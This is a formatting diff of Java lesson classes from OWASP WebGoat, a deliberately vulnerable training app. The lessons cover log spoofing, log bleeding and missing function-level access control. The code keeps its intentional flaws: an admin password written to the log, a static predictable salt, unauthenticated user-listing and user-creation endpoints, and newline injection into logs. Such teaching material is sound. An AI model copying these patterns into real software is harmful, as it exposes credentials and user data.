--- a/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.lessontemplate;
 
+import java.util.List;
 import lombok.AllArgsConstructor;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -35,56 +36,56 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.List;
-
-/**
- * Created by jason on 1/5/17.
- */
-
+/** Created by jason on 1/5/17. */
 @RestController
 @AssignmentHints({"lesson-template.hints.1", "lesson-template.hints.2", "lesson-template.hints.3"})
 public class SampleAttack extends AssignmentEndpoint {
 
-    String secretValue = "secr37Value";
+  String secretValue = "secr37Value";
 
-    //UserSessionData is bound to session and can be used to persist data across multiple assignments
-    @Autowired
-    UserSessionData userSessionData;
+  // UserSessionData is bound to session and can be used to persist data across multiple assignments
+  @Autowired UserSessionData userSessionData;
 
-    @PostMapping("/lesson-template/sample-attack")
-    @ResponseBody
-    public AttackResult completed(@RequestParam("param1") String param1, @RequestParam("param2") String param2) {
-        if (userSessionData.getValue("some-value") != null) {
-            // do any session updating you want here ... or not, just comment/example here
-            //return failed().feedback("lesson-template.sample-attack.failure-2").build());
-        }
-
-        //overly simple example for success. See other existing lesssons for ways to detect 'success' or 'failure'
-        if (secretValue.equals(param1)) {
-            return success(this)
-                    .output("Custom Output ...if you want, for success")
-                    .feedback("lesson-template.sample-attack.success")
-                    .build();
-            //lesson-template.sample-attack.success is defined in src/main/resources/i18n/WebGoatLabels.properties
-        }
-
-        // else
-        return failed(this)
-                .feedback("lesson-template.sample-attack.failure-2")
-                .output("Custom output for this failure scenario, usually html that will get rendered directly ... yes, you can self-xss if you want")
-                .build();
+  @PostMapping("/lesson-template/sample-attack")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam("param1") String param1, @RequestParam("param2") String param2) {
+    if (userSessionData.getValue("some-value") != null) {
+      // do any session updating you want here ... or not, just comment/example here
+      // return failed().feedback("lesson-template.sample-attack.failure-2").build());
     }
 
-    @GetMapping("lesson-template/shop/{user}")
-    @ResponseBody
-    public List<Item> getItemsInBasket(@PathVariable("user") String user) {
-        return List.of(new Item("WG-1", "WebGoat promo", 12.0), new Item("WG-2", "WebGoat sticker", 0.00));
+    // overly simple example for success. See other existing lesssons for ways to detect 'success'
+    // or 'failure'
+    if (secretValue.equals(param1)) {
+      return success(this)
+          .output("Custom Output ...if you want, for success")
+          .feedback("lesson-template.sample-attack.success")
+          .build();
+      // lesson-template.sample-attack.success is defined in
+      // src/main/resources/i18n/WebGoatLabels.properties
     }
 
-    @AllArgsConstructor
-    private class Item {
-        private String number;
-        private String description;
-        private double price;
-    }
+    // else
+    return failed(this)
+        .feedback("lesson-template.sample-attack.failure-2")
+        .output(
+            "Custom output for this failure scenario, usually html that will get rendered directly"
+                + " ... yes, you can self-xss if you want")
+        .build();
+  }
+
+  @GetMapping("lesson-template/shop/{user}")
+  @ResponseBody
+  public List<Item> getItemsInBasket(@PathVariable("user") String user) {
+    return List.of(
+        new Item("WG-1", "WebGoat promo", 12.0), new Item("WG-2", "WebGoat sticker", 0.00));
+  }
+
+  @AllArgsConstructor
+  private class Item {
+    private String number;
+    private String description;
+    private double price;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
index 54b1e6925..710f22f1a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.logging;
 
+import java.nio.charset.StandardCharsets;
+import java.util.Base64;
+import java.util.UUID;
+import javax.annotation.PostConstruct;
 import org.apache.logging.log4j.util.Strings;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -32,35 +36,31 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import java.util.Base64;
-
-import java.nio.charset.StandardCharsets;
-import java.util.UUID;
-
 @RestController
 public class LogBleedingTask extends AssignmentEndpoint {
 
-    Logger log = LoggerFactory.getLogger(this.getClass().getName());
-    private String password;
+  Logger log = LoggerFactory.getLogger(this.getClass().getName());
+  private String password;
 
-    @PostConstruct
-    public void generatePassword(){
-        password = UUID.randomUUID().toString();
-        log.info("Password for admin: {}", Base64.getEncoder().encodeToString(password.getBytes(StandardCharsets.UTF_8)));
+  @PostConstruct
+  public void generatePassword() {
+    password = UUID.randomUUID().toString();
+    log.info(
+        "Password for admin: {}",
+        Base64.getEncoder().encodeToString(password.getBytes(StandardCharsets.UTF_8)));
+  }
+
+  @PostMapping("/LogSpoofing/log-bleeding")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+    if (Strings.isEmpty(username) || Strings.isEmpty(password)) {
+      return failed(this).output("Please provide username (Admin) and password").build();
     }
 
-    @PostMapping("/LogSpoofing/log-bleeding")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
-        if (Strings.isEmpty(username) || Strings.isEmpty(password)) {
-            return failed(this).output("Please provide username (Admin) and password").build();
-        }
-
-        if (username.equals("Admin") && password.equals(this.password)) {
-            return success(this).build();
-        }
-
-        return failed(this).build();
+    if (username.equals("Admin") && password.equals(this.password)) {
+      return success(this).build();
     }
+
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
index ec5c814fb..b92d05572 100644
--- a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class LogSpoofing extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A9;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A9;
+  }
 
-    @Override
-    public String getTitle() {
-        return "logging.title";
-    }
+  @Override
+  public String getTitle() {
+    return "logging.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
index c521e12b5..0fe3b3559 100644
--- a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
@@ -33,19 +33,19 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class LogSpoofingTask extends AssignmentEndpoint {
 
-    @PostMapping("/LogSpoofing/log-spoofing")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
-        if (Strings.isEmpty(username)) {
-            return failed(this).output(username).build();
-        }
-        username = username.replace("\n", "<br/>");
-        if (username.contains("<p>") || username.contains("<div>")) {
-            return failed(this).output("Try to think of something simple ").build();
-        }
-        if (username.indexOf("<br/>") < username.indexOf("admin")) {
-            return success(this).output(username).build();
-        }
-        return failed(this).output(username).build();
+  @PostMapping("/LogSpoofing/log-spoofing")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+    if (Strings.isEmpty(username)) {
+      return failed(this).output(username).build();
     }
+    username = username.replace("\n", "<br/>");
+    if (username.contains("<p>") || username.contains("<div>")) {
+      return failed(this).output("Try to think of something simple ").build();
+    }
+    if (username.indexOf("<br/>") < username.indexOf("admin")) {
+      return success(this).output(username).build();
+    }
+    return failed(this).output(username).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java b/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
index f474dce5d..90eb06c8d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
@@ -1,62 +1,62 @@
 package org.owasp.webgoat.lessons.missingac;
 
-import lombok.Getter;
-
 import java.nio.charset.StandardCharsets;
 import java.security.MessageDigest;
 import java.util.Base64;
+import lombok.Getter;
 
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  */
 @Getter
 public class DisplayUser {
-    //intended to provide a display version of WebGoatUser for admins to view user attributes
+  // intended to provide a display version of WebGoatUser for admins to view user attributes
 
-    private String username;
-    private boolean admin;
-    private String userHash;
+  private String username;
+  private boolean admin;
+  private String userHash;
 
-    public DisplayUser(User user, String passwordSalt) {
-        this.username = user.getUsername();
-        this.admin = user.isAdmin();
+  public DisplayUser(User user, String passwordSalt) {
+    this.username = user.getUsername();
+    this.admin = user.isAdmin();
 
-        try {
-            this.userHash = genUserHash(user.getUsername(), user.getPassword(), passwordSalt);
-        } catch (Exception ex) {
-            this.userHash = "Error generating user hash";
-        }
-    }
-
-    protected String genUserHash(String username, String password, String passwordSalt) throws Exception {
-        MessageDigest md = MessageDigest.getInstance("SHA-256");
-        // salting is good, but static & too predictable ... short too for a salt
-        String salted = password + passwordSalt + username;
-        //md.update(salted.getBytes("UTF-8")); // Change this to "UTF-16" if needed
-        byte[] hash = md.digest(salted.getBytes(StandardCharsets.UTF_8));
-        return Base64.getEncoder().encodeToString(hash);
+    try {
+      this.userHash = genUserHash(user.getUsername(), user.getPassword(), passwordSalt);
+    } catch (Exception ex) {
+      this.userHash = "Error generating user hash";
     }
+  }
 
+  protected String genUserHash(String username, String password, String passwordSalt)
+      throws Exception {
+    MessageDigest md = MessageDigest.getInstance("SHA-256");
+    // salting is good, but static & too predictable ... short too for a salt
+    String salted = password + passwordSalt + username;
+    // md.update(salted.getBytes("UTF-8")); // Change this to "UTF-16" if needed
+    byte[] hash = md.digest(salted.getBytes(StandardCharsets.UTF_8));
+    return Base64.getEncoder().encodeToString(hash);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
index 7c0615e6e..584542928 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
@@ -1,5 +1,6 @@
 package org.owasp.webgoat.lessons.missingac;
 
+import java.util.List;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.springframework.jdbc.core.RowMapper;
 import org.springframework.jdbc.core.namedparam.MapSqlParameterSource;
@@ -7,39 +8,42 @@ import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate;
 import org.springframework.stereotype.Component;
 import org.springframework.util.CollectionUtils;
 
-import java.util.List;
-
 @Component
 public class MissingAccessControlUserRepository {
 
-    private final NamedParameterJdbcTemplate jdbcTemplate;
-    private final RowMapper<User> mapper = (rs, rowNum) -> new User(rs.getString("username"), rs.getString("password"), rs.getBoolean("admin"));
+  private final NamedParameterJdbcTemplate jdbcTemplate;
+  private final RowMapper<User> mapper =
+      (rs, rowNum) ->
+          new User(rs.getString("username"), rs.getString("password"), rs.getBoolean("admin"));
 
-    public MissingAccessControlUserRepository(LessonDataSource lessonDataSource) {
-        this.jdbcTemplate = new NamedParameterJdbcTemplate(lessonDataSource);
-    }
-
-    public List<User> findAllUsers() {
-        return jdbcTemplate.query("select username, password, admin from access_control_users", mapper);
-    }
-
-    public User findByUsername(String username) {
-        var users = jdbcTemplate.query("select username, password, admin from access_control_users where username=:username",
-                new MapSqlParameterSource().addValue("username", username),
-                mapper);
-        if (CollectionUtils.isEmpty(users)) {
-            return null;
-        }
-        return users.get(0);
-    }
-
-    public User save(User user) {
-        jdbcTemplate.update("INSERT INTO access_control_users(username, password, admin) VALUES(:username,:password,:admin)",
-                new MapSqlParameterSource()
-                        .addValue("username", user.getUsername())
-                        .addValue("password", user.getPassword())
-                        .addValue("admin", user.isAdmin()));
-        return user;
+  public MissingAccessControlUserRepository(LessonDataSource lessonDataSource) {
+    this.jdbcTemplate = new NamedParameterJdbcTemplate(lessonDataSource);
+  }
+
+  public List<User> findAllUsers() {
+    return jdbcTemplate.query("select username, password, admin from access_control_users", mapper);
+  }
+
+  public User findByUsername(String username) {
+    var users =
+        jdbcTemplate.query(
+            "select username, password, admin from access_control_users where username=:username",
+            new MapSqlParameterSource().addValue("username", username),
+            mapper);
+    if (CollectionUtils.isEmpty(users)) {
+      return null;
     }
+    return users.get(0);
+  }
 
+  public User save(User user) {
+    jdbcTemplate.update(
+        "INSERT INTO access_control_users(username, password, admin)"
+            + " VALUES(:username,:password,:admin)",
+        new MapSqlParameterSource()
+            .addValue("username", user.getUsername())
+            .addValue("password", user.getPassword())
+            .addValue("admin", user.isAdmin()));
+    return user;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
index 80dd3a676..46323aca2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
@@ -29,16 +29,16 @@ import org.springframework.stereotype.Component;
 @Component
 public class MissingFunctionAC extends Lesson {
 
-    public static final String PASSWORD_SALT_SIMPLE = "DeliberatelyInsecure1234";
-    public static final String PASSWORD_SALT_ADMIN = "DeliberatelyInsecure1235";
+  public static final String PASSWORD_SALT_SIMPLE = "DeliberatelyInsecure1234";
+  public static final String PASSWORD_SALT_ADMIN = "DeliberatelyInsecure1235";
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A1;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A1;
+  }
 
-    @Override
-    public String getTitle() {
-        return "missing-function-access-control.title";
-    }
+  @Override
+  public String getTitle() {
+    return "missing-function-access-control.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
index 1768e532c..8cf11a6fb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
@@ -29,33 +29,28 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-/**
- * Created by jason on 1/5/17.
- */
+/** Created by jason on 1/5/17. */
 @RestController
-@AssignmentHints({"access-control.hidden-menus.hint1","access-control.hidden-menus.hint2","access-control.hidden-menus.hint3"})
+@AssignmentHints({
+  "access-control.hidden-menus.hint1",
+  "access-control.hidden-menus.hint2",
+  "access-control.hidden-menus.hint3"
+})
 public class MissingFunctionACHiddenMenus extends AssignmentEndpoint {
 
-    @PostMapping(path = "/access-control/hidden-menu", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(String hiddenMenu1, String hiddenMenu2) {
-        if (hiddenMenu1.equals("Users") && hiddenMenu2.equals("Config")) {
-            return success(this)
-                    .output("")
-                    .feedback("access-control.hidden-menus.success")
-                    .build();
-        }
-
-        if (hiddenMenu1.equals("Config") && hiddenMenu2.equals("Users")) {
-            return failed(this)
-                    .output("")
-                    .feedback("access-control.hidden-menus.close")
-                    .build();
-        }
-
-        return failed(this)
-                .feedback("access-control.hidden-menus.failure")
-                .output("")
-                .build();
+  @PostMapping(
+      path = "/access-control/hidden-menu",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(String hiddenMenu1, String hiddenMenu2) {
+    if (hiddenMenu1.equals("Users") && hiddenMenu2.equals("Config")) {
+      return success(this).output("").feedback("access-control.hidden-menus.success").build();
     }
+
+    if (hiddenMenu1.equals("Config") && hiddenMenu2.equals("Users")) {
+      return failed(this).output("").feedback("access-control.hidden-menus.close").build();
+    }
+
+    return failed(this).feedback("access-control.hidden-menus.failure").output("").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
index 1e248c64e..0bbf9d68d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
@@ -22,6 +22,12 @@
 
 package org.owasp.webgoat.lessons.missingac;
 
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.stream.Collectors;
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.session.WebSession;
@@ -34,70 +40,75 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.servlet.ModelAndView;
 
-import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
-import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.stream.Collectors;
-
-/**
- * Created by jason on 1/5/17.
- */
+/** Created by jason on 1/5/17. */
 @Controller
 @AllArgsConstructor
 @Slf4j
 public class MissingFunctionACUsers {
 
-    private final MissingAccessControlUserRepository userRepository;
-    private final WebSession webSession;
+  private final MissingAccessControlUserRepository userRepository;
+  private final WebSession webSession;
 
-    @GetMapping(path = {"access-control/users"})
-    public ModelAndView listUsers() {
+  @GetMapping(path = {"access-control/users"})
+  public ModelAndView listUsers() {
 
-        ModelAndView model = new ModelAndView();
-        model.setViewName("list_users");
-        List<User> allUsers = userRepository.findAllUsers();
-        model.addObject("numUsers", allUsers.size());
-        //add display user objects in place of direct users
-        List<DisplayUser> displayUsers = new ArrayList<>();
-        for (User user : allUsers) {
-            displayUsers.add(new DisplayUser(user, PASSWORD_SALT_SIMPLE));
-        }
-        model.addObject("allUsers", displayUsers);
+    ModelAndView model = new ModelAndView();
+    model.setViewName("list_users");
+    List<User> allUsers = userRepository.findAllUsers();
+    model.addObject("numUsers", allUsers.size());
+    // add display user objects in place of direct users
+    List<DisplayUser> displayUsers = new ArrayList<>();
+    for (User user : allUsers) {
+      displayUsers.add(new DisplayUser(user, PASSWORD_SALT_SIMPLE));
+    }
+    model.addObject("allUsers", displayUsers);
 
-        return model;
+    return model;
+  }
+
+  @GetMapping(
+      path = {"access-control/users"},
+      consumes = "application/json")
+  @ResponseBody
+  public ResponseEntity<List<DisplayUser>> usersService() {
+    return ResponseEntity.ok(
+        userRepository.findAllUsers().stream()
+            .map(user -> new DisplayUser(user, PASSWORD_SALT_SIMPLE))
+            .collect(Collectors.toList()));
+  }
+
+  @GetMapping(
+      path = {"access-control/users-admin-fix"},
+      consumes = "application/json")
+  @ResponseBody
+  public ResponseEntity<List<DisplayUser>> usersFixed() {
+    var currentUser = userRepository.findByUsername(webSession.getUserName());
+    if (currentUser != null && currentUser.isAdmin()) {
+      return ResponseEntity.ok(
+          userRepository.findAllUsers().stream()
+              .map(user -> new DisplayUser(user, PASSWORD_SALT_ADMIN))
+              .collect(Collectors.toList()));
+    }
+    return ResponseEntity.status(HttpStatus.FORBIDDEN).build();
+  }
+
+  @PostMapping(
+      path = {"access-control/users", "access-control/users-admin-fix"},
+      consumes = "application/json",
+      produces = "application/json")
+  @ResponseBody
+  public User addUser(@RequestBody User newUser) {
+    try {
+      userRepository.save(newUser);
+      return newUser;
+    } catch (Exception ex) {
+      log.error("Error creating new User", ex);
+      return null;
     }
 
-    @GetMapping(path = {"access-control/users"}, consumes = "application/json")
-    @ResponseBody
-    public ResponseEntity<List<DisplayUser>> usersService() {
-        return ResponseEntity.ok(userRepository.findAllUsers().stream().map(user -> new DisplayUser(user, PASSWORD_SALT_SIMPLE)).collect(Collectors.toList()));
-    }
+    // @RequestMapping(path = {"user/{username}","/"}, method = RequestMethod.DELETE, consumes =
+    // "application/json", produces = "application/json")
+    // TODO implement delete method with id param and authorization
 
-    @GetMapping(path = {"access-control/users-admin-fix"}, consumes = "application/json")
-    @ResponseBody
-    public ResponseEntity<List<DisplayUser>> usersFixed() {
-        var currentUser = userRepository.findByUsername(webSession.getUserName());
-        if (currentUser != null && currentUser.isAdmin()) {
-            return ResponseEntity.ok(userRepository.findAllUsers().stream().map(user -> new DisplayUser(user, PASSWORD_SALT_ADMIN)).collect(Collectors.toList()));
-        }
-        return ResponseEntity.status(HttpStatus.FORBIDDEN).build();
-    }
-
-    @PostMapping(path = {"access-control/users", "access-control/users-admin-fix"}, consumes = "application/json", produces = "application/json")
-    @ResponseBody
-    public User addUser(@RequestBody User newUser) {
-        try {
-            userRepository.save(newUser);
-            return newUser;
-        } catch (Exception ex) {
-            log.error("Error creating new User", ex);
-            return null;
-        }
-
-        //@RequestMapping(path = {"user/{username}","/"}, method = RequestMethod.DELETE, consumes = "application/json", produces = "application/json")
-        //TODO implement delete method with id param and authorization
-
-    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
index 043fe905a..8417ae059 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
@@ -22,10 +22,9 @@
 
 package org.owasp.webgoat.lessons.missingac;
 
-import lombok.RequiredArgsConstructor;
-
 import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
+import lombok.RequiredArgsConstructor;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -34,22 +33,29 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"access-control.hash.hint1", "access-control.hash.hint2", "access-control.hash.hint3", "access-control.hash.hint4", "access-control.hash.hint5"})
+@AssignmentHints({
+  "access-control.hash.hint1",
+  "access-control.hash.hint2",
+  "access-control.hash.hint3",
+  "access-control.hash.hint4",
+  "access-control.hash.hint5"
+})
 @RequiredArgsConstructor
 public class MissingFunctionACYourHash extends AssignmentEndpoint {
 
-    private final MissingAccessControlUserRepository userRepository;
+  private final MissingAccessControlUserRepository userRepository;
 
-
-    @PostMapping(path = "/access-control/user-hash", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult simple(String userHash) {
-        User user = userRepository.findByUsername("Jerry");
-        DisplayUser displayUser = new DisplayUser(user, PASSWORD_SALT_SIMPLE);
-        if (userHash.equals(displayUser.getUserHash())) {
-            return success(this).feedback("access-control.hash.success").build();
-        } else {
-            return failed(this).build();
-        }
+  @PostMapping(
+      path = "/access-control/user-hash",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult simple(String userHash) {
+    User user = userRepository.findByUsername("Jerry");
+    DisplayUser displayUser = new DisplayUser(user, PASSWORD_SALT_SIMPLE);
+    if (userHash.equals(displayUser.getUserHash())) {
+      return success(this).feedback("access-control.hash.success").build();
+    } else {
+      return failed(this).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
index 80c8d185b..52f9dbcb4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
@@ -32,29 +32,37 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"access-control.hash.hint6", "access-control.hash.hint7",
-        "access-control.hash.hint8", "access-control.hash.hint9", "access-control.hash.hint10", "access-control.hash.hint11", "access-control.hash.hint12"})
+@AssignmentHints({
+  "access-control.hash.hint6",
+  "access-control.hash.hint7",
+  "access-control.hash.hint8",
+  "access-control.hash.hint9",
+  "access-control.hash.hint10",
+  "access-control.hash.hint11",
+  "access-control.hash.hint12"
+})
 public class MissingFunctionACYourHashAdmin extends AssignmentEndpoint {
 
-    private final MissingAccessControlUserRepository userRepository;
+  private final MissingAccessControlUserRepository userRepository;
 
-    public MissingFunctionACYourHashAdmin(MissingAccessControlUserRepository userRepository) {
-        this.userRepository = userRepository;
+  public MissingFunctionACYourHashAdmin(MissingAccessControlUserRepository userRepository) {
+    this.userRepository = userRepository;
+  }
+
+  @PostMapping(
+      path = "/access-control/user-hash-fix",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult admin(String userHash) {
+    // current user should be in the DB
+    // if not admin then return 403
+
+    var user = userRepository.findByUsername("Jerry");
+    var displayUser = new DisplayUser(user, PASSWORD_SALT_ADMIN);
+    if (userHash.equals(displayUser.getUserHash())) {
+      return success(this).feedback("access-control.hash.success").build();
+    } else {
+      return failed(this).feedback("access-control.hash.close").build();
     }
-
-    @PostMapping(path = "/access-control/user-hash-fix", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult admin(String userHash) {
-        //current user should be in the DB
-        //if not admin then return 403
-
-        var user = userRepository.findByUsername("Jerry");
-        var displayUser = new DisplayUser(user, PASSWORD_SALT_ADMIN);
-        if (userHash.equals(displayUser.getUserHash())) {
-            return success(this).feedback("access-control.hash.success").build();
-        } else {
-            return failed(this).feedback("access-control.hash.close").build();
-        }
-    }
-
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/missingac/User.java b/src/main/java/org/owasp/webgoat/lessons/missingac/User.java
index f5b8161f7..d7e23c887 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missingac/User.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/User.java
@@ -9,7 +9,7 @@ import lombok.NoArgsConstructor;
 @NoArgsConstructor
 public class User {
 
-    private String username;
-    private String password;
-    private boolean admin;
+  private String username;
+  private String password;
+  private boolean admin;
 }
